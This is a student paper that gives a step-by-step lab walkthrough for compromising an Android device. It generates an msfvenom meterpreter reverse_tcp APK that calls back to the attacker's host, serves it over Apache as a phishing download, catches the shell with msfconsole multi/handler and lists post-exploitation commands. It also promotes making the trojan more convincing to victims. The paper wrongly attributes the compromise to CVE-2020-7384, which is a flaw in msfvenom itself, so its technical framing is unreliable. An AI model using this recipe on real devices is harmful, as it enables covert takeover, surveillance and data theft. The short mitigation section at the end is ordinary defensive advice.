See discussions, stats, and author profiles for this publication at: https://www.researchgate.

net/publication/361728820

Access Android Devices with the Metasploit Framework from Kali Linux OS

Article · July 2022

CITATIONS READS
0 12,133

1 author:

Senesh Wijayarathne
Sri Lanka Institute of Information Technology
9 PUBLICATIONS 0 CITATIONS

SEE PROFILE

All content following this page was uploaded by Senesh Wijayarathne on 03 July 2022.

The user has requested enhancement of the downloaded file.

 Access Android Devices with the Metasploit
Framework from Kali Linux OS
Senesh N. Wijayarathne
Sri Lanka Institute of Information Technology (SLIIT), Malabe, Sri Lanka
senesh.wijayarathne@gmail.com
Abstract — This study focuses on how someone could use
the Rapid7’s Metasploit msfvenom framework to handle
malicious APK files and access android devices by using
phishing or social engineering methods. This study uses a
Kali Linux Virtual Machine (VM) and an Android 9.0
Virtual Machine. With the Android device user
downloading the malicious APK file that was generated
and embedded using ‘msfvenom’ and ‘msfconsole,’ we
could receive sessions to the Android device. After the
download is completed, we could gain access to the
Android device due to the vulnerability that is known as
CVE-2020-7384. This study will give details on how to
improve such malicious APK files to be more convincing.
This study will contain precise information on related
attacks for this mentioned vulnerability and a brief
discussion of how to mitigate this type of vulnerability.
Keywords — Metasploit, Msfvenom, Malicious APK files,
Android Devices, Phishing, Social Engineering, Kali
Linux, Virtual Machine, CVE-2020-7384.
I. INTRODUCTION
The Android Operating System (OS) that runs on any
Android device is based on a modification of the Open Source
Linux kernel. Since the start of Android version 1.0 in 2008
[1], Android devices and Android versions have been
improving and developing to the modern future. Currently, the
Android version 13.0 was launched by Google on the 10th of
February 2022 [2].
This exploitation is simple but efficient exploitation
that uses the creativity of the cyber attacker. In this
exploitation, we would just be using an APK file with no
initial purposes rather than exploiting the vulnerability. Still,
this APK file could be written as an application that would
benefit the victim to download and use. Then this malicious
APK file could be downloaded to the victim’s device, acting
as a trojan malware that contains a practical application for the
victim.
This paper contains details on how to generate and
embed an APK file and how to set the necessary information
and key factors for the exploitation to succeed. This paper
contains details on the victim who would download this
malicious APK file and what kind of commands could be run
1
by the cyber attacker after the victim successfully downloads
the malicious APK file to their Android devices.
The CVE-2020-7384 vulnerability was described as
that would allow a malicious user to formulate and publish a
malicious APK file that was handled by Rapid7’s Metasploit
msfvenom framework that would execute arbitrary commands
on the victim’s Android device [3]. With a CVE score of 9.3,
this vulnerability was listed as one of the most critical
vulnerabilities [4]. Complexity and the Access type were
respectfully listed as Medium and Remote. The specific CWE
ID for this vulnerability was listed as number CWE-77
(Improper Neutralization of Special Elements used in a
Command, also known as Command Injection [5])[4].
The rest of this paper is arranged as follows: Session
II, the ‘Methodology’ session, this session would provide
details about how the research was conducted and how the
exploitation was done. Session III, the ‘Results’ session,
provides the data that was collected and the outcomes. This
session would cover what types of commands could be
executed after the exploitation was successful. Session IV, the
final session is the ‘Discussion’ session, and this session
provides details about a related attack to this vulnerability and
how to mitigate such vulnerabilities.
II. METHODOLOGY
Exploiting an Android device via the internet with
the use of Rapid7’s Metasploit msfvenom framework by
hiding the malicious APK file as a Trojan malware is
somewhat easier than other exploitations. For this trial exploit
to succeed we would require two Virtual Machines (VMs),
one for the attacker and one for the victim, and those VMs
should be respectively a Kali Linux machine and a machine
that runs on an Android Operating System (OS).
Knowing the Kali Linux VM IPv4 address is
important for generating the malicious APK file. By executing
the ‘ifconfig’ command on the terminal we could get the
IPv4 address for the Kali Linux VM. With knowing the IPv4
address we could simply use the Rapid7’s Metasploit
msfvenom framework and generate a malicious APK file. The
following command could be used to generate the necessary
APK file; ‘msfvenom -p android/meterpreter/revers
e_tcp LHOST=[Host VM IP] LPORT=4444 R > /var/w
ww/html/[APK File Name].apk.’ Figure 01 will display
the command and the generated output from that command.

Figure 01
Generating the APK file using msfvenom

Since this malicious APK file would be sent through

the Internet, the next step would be to start up the apache
server. ‘service apache2 start’ command will start up the Figure 03
apache server and we could check the status of the server by Setting the payload and viewing the Options
using the ‘service apache2 status’ command.
The next big step of this exploitation would be
launching the Metasploit msfconsole framework. By using the
command ‘msfconsole’ we could start the Metasploit
msfconsole framework. Figure 02 will display the loaded
Figure 04
Metasploit msfconsole framework. Starting the exploitation

Since we did not do any modifications to the APK

file to hide it as a Troaj Malware, it would be displayed
maliciously. Now, since the application is sent to the web we
could send the necessary malicious link to the user so that they
could download the malicious APK file to their Android
device. Since there are no modifications or improvements
were done to the APK file or the link that holds the APK file,
it would be obvious that this is a malicious file, but if those
necessary modifications and improvements have been made
the user would find it difficult to know or find about the APK
file without downloading it. In this scenario the malicious link
Figure 02
would be; ‘http://[Host VM IP]:[Port Number]/[APK
Loaded Metasploit msfconsole Framework
File Name].apk’ Figure 05 will display how it would be
shown at the moment for the user without any modifications
Using the multi-handler option under exploit with the
and improvements made.
previous payload would be the next step of this Android
exploitation. After the msfconsole framework has been loaded
we could use the following commands to set the payload;
‘use exploit/multi/handler,’ and ‘set payload android
/meterpreter/reverse_tcp.’ Figure 03 will display the
mentioned commands and the options that they generated.
Analyzing the options that were displayed we could
notice that the ‘LHOST’ is not set for an IPv4, since the
LHOST would be the listing VM or the Kali Linux VM we
could set the LHOST to the IPv4 address of the Kali Linux
VM. With that set, we have all the options we need for the
exploitation and we just have to type on the command
‘exploit’ to execute this attack. Figure 04 will display the
previously mentioned command and how the exploit would
start. Figure 05
Display when the user enters the link that holds the malicious APK

2
 Entering the link with the malicious APK file would
automatically download the file to the user’s memory card.
After the download is completed the user would have to install
the malicious APK file to their system. After the installation is
done, and when the user clicks on the installed file, we could
get a session to the user’s Android device from our Kali Linux
machine. So, simply like that we could exploit an Android
device.
III. RESULTS
The malicious APK file was downloaded and
installed on the Android device by the user, we could get
sessions to the Android device on our Kali Linux machine.
After receiving several sessions to one IPv4 address, we could
use the command ‘sessions -i [session number]’ to get
access to a specific session. With that, now we have access to
the user’s Android device and we could start to execute
malicious commands and get details and information about the
victim.
The easiest way to find what to do next and what
commands could be executed on the Android device could be
found under that session. By simply executing the ‘help’
commands we could get all the details and commands that
could be executed. The command ‘help’ will display several
types of commands, such as;
1. Core Commands
2. Network Commands
3. File System Commands
4. User interface Commands
5. System Commands
6. Audio Output Commands
7. Application Controller Commands
8. Webcam Commands
9. Under each type of command
There would be several other commands with the
description of what that command does with the execution of
it. Just by typing the command that the attacker would require
would get it done with the help of the meterpreter session the
attacker is on.
IV. DISCUSSION
In the previous sessions, session ‘Methodology’ and
the session ‘Results,’ it was shown how to generate and
embed a malicious APK file and how the victim would
download it for the attack to execute future; but with the
advancement of technology and cyber attackers thinking out
of the box to improve their attacks, newer ways, and more
efficient ways have been discovered that could be used to send
a malicious APK file to an Android device.
As discussed in the ‘Methodology’ session, cyber
attackers could spend more time on the malicious APK file
and make the file useful for the victim so they would
3
download it and use it. Another way to send a user a malicious
APK file is to attach it to web advertisements and websites.
Another more efficient way is to get the download started
even without the user interaction. According to Andrew
Brandt, a researcher at SophosLabs Principal, in 2016, the
cyber security firm did witness for the first time an exploit kit
that enables the installation of malicious APK files into
mobile devices without any user interaction and that
ransomware was named ‘Dogspectus’[6].
The ransomware that was known as Dogspectus has
only targeted Android devices, and the quest was to gain
iTunes gift cards from Apple. This ransomware was
discovered when an older testing Android device (a Samsung
Tablet that was running on the Cyanogenmod 10 version) was
hit with a malicious advertisement loaded up with JavaScript
pointing to the ransomware [6]. According to Blue Coat, at
least a number of 224 Android devices that were running on
versions 4.0.3 to 4.4.4 had been victims of this Trojan
malware, and the ransom payment was two iTunes gift card
codes from Apple that are worth $100 each [6].
The Dogspectus Trojan ransomware was the first to
reach a user's mobile devices via an auto-downloading
method, but it certainly was not the last [7]. In 2016, 318,000
devices were affected by the Svpeng Android banking trojan
malware. By discovering a flaw in Google Chrome, when
handing file downloads, the cyber attackers had executed this
trojan malware specifying only the Russians [7]. The Svpeng
authors had used malicious JavaScript to deliver their
malicious payload to the user via Google AdSense on Russian
sites [7]. In general circumstances, the downloaded APK
would have prompted the users to verify the location where
they want the download to be saved, but authors on Svpend’s
had uncovered that if they were to break the APK file into
blocks of 1024 bytes, the download would take place without
notifying the user by Google Chrome for Android devices,
and the malicious APK file would be reconstructed on the
memory card of the user without their knowledge [7].
Figure 06
Svpeng Android Banking Trojan auto-downloading campaign activity
Since Trojan Horse is used as a delivery device for
 View publication stats
quite a several different types of malware that serve different
purposes, you would have to look for many of the same
telltale signs if you suspect that your device may have been
breached by Trojan Horse Malware. A few of the things that
you used to look into include [8]:
● Flawed Device Performance - Is your mobile device or
computer device crashing more often than usual or
running slow?
● Strange Device Behavior - Does your mobile or
computer device have unexplained processes being
executed or have programs running that you did not
initiate?
● Pop-up and Spam Interruptions - Are you noticing an
uptick in the number of interruptions from email spam
and web browser pop-ups?
If such symptoms are exhibited from your mobile
device or the computer device, it could be possible that your
device is hosting a trojan virus. Try searching for applications,
software, programs, or anything that you did not download or
install yourself on your device. You can also enter any
unrecognized file names into an online search engine to
determine whether they are recognized as Trojan malware [8].
Effective Cyber Security software and applications
should be the front line of protecting your mobile device or
computer device against the most common cyber security
threats. An effective internet security solution should have a
few main features, which include: speed, frequent scans, and
alert reports or notifications as soon as a Trojan Malware is
detected [8]. A few best practices that you could do in
addition to installing verified cyber security software or
application to help keep yourself safe from Trojan Horse are;
● Only download or install software, programs, and
applications from sources that you trust completely.
● Never open email attachments or execute programs sent
to you via email from someone you do not know.
● Do not miss any software updates or system updates on
your devices, be up to date with the latest patches.
● Make sure to download and install a recommended
antivirus system and keep it running on your devices.
ACKNOWLEDGMENT
I would like to take this time and space to thank
everyone who supported me and guided me on the right path
for the success of this paper. I would like to especially thank
the lecturers in charge of the module Mobile Security in Sri
Lanka Institute of Information Technology - SLIIT in 2022,
Mr. Kavinga Yapa Abeywardena and Ms. Chethana
Liyanapathirana for providing guidance and help during
lectures and laboratory sessions.
I would also like to thank my friends who I would
talk to and discuss how to get some coding sessions done and
to get opinions about their approaches and mitigation
methods. Finally, I would like to thank my family members
for the support and encouragement that they showed when I
hit a roadblock during this paper.
REFERENCES
[1] J. R. Raphael, "Android versions: A living history from 1.0 to 13," 01
March 2022. [Online]. Available: https://www.computerworld.com/articl
e/3235946/android-versions-a-living-history-from-1-0-to-today.html.
[Accessed 25 May 2022].
[2] J. R. Raphael, "Android versions: A living history from 1.0 to 13," 01
March 2022. [Online]. Available: https://www.computerworld.com/articl
e/3235946/android-versions-a-living-history-from-1-0-to-today.html?pa
ge=2 [Acce ssed 25 May 2022].
[3] "CVE-2020-7384," 21 January 2020. [Online]. Available: https://cve.
mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7384. [Accessed 25
May 2022].
[4] "Rapid7 » Metasploit : Security Vulnerabilities," [Online]. Available:
https://www.cvedetails.com/vulnerability-list/vendor_id-13102/product_
id-36106/Rapid7-Metasploit.html. [Accessed 25 May 2022].
[5] "CVE-2020-7384 Detail," NVD NIST, 02 March 2021. [Online].
Available: https://nvd.nist.gov/vuln/detail/CVE- 2020-7384. [Accessed
25 May 2022].
[6] C. Osborne, "Dogspectus ransomware targets Android devices in the
quest for Apple iTunes gift cards," ZDNet, 25 April 2016. [Online].
Available: https://www.zdnet.com/article/hacking-team-exploits-delivers
-dogspectus-ransomware-to-android-devices/. [Accessed 25 May 2022]
[7] C. Cimpanu, "Over 318,000 Android Users Affected by
Auto-Downloading Malvertising Attack," BleepingComp uter, 08
November 2016. [Online]. Available: https://www.bleepingcomputer.
com/news/security/over-318-000-android-users-affected-by-auto-downl
oading-malvertising-attack/. [Accessed 25 May 2022].
[8] "What is a Trojan Virus?," WEBROOT, [Online]. Available:
https://www.webroot.com/us/en/resources/tips-articles/what-is-trojan-vir
us. [Accessed 18 May 2022].
AUTHOR PROFILE
Senesh Wijayarathne is a third-year undergraduate specializing in
Cyber Security from Sri Lanka Institute of Information
Technology (SLIIT), Malabe, Sri Lanka. Senesh was the Vice
President for Incoming Global Volunteer - International Relations
of AIESEC in SLIIT for the term 21.22.
AIESEC is the world's largest youth-run
organization. He is the author of one book
that gives in-depth information about Bug
Bounty Programming & Web Security
Auditing.
Be in touch with Senesh:
Email: senesh.wiajayarathne@gmail.com
Instagram: instagram.com/senesh_wijayarathne
Publications;
Leanpub: leanpub.com/u/Senesh-Wijayarathne
Researchgate: researchgate.net/profile/Senesh-Wijayarathne